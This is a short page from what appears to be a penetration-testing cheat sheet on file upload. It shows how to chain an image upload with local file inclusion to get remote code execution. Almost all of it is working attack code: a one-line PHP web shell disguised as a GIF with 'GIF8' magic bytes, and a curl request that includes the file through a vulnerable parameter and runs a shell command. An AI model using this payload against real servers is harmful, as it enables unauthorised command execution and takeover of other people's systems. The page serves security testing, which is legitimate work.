file-upload.md

file upload

Image Upload

{% hint style="info" %} The prerequisite for this method is to be able to upload a file. {% endhint %}

# GIF8 is for magic bytes
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

curl --user-agent "PENTEST" "$URL/?parameter=/path/to/image/shell.gif&cmd=id"

{% hint style="info" %} Other LFI to RCE via file upload methods may be found later on the chapter LFI to RCE (via php wrappers). {% endhint %}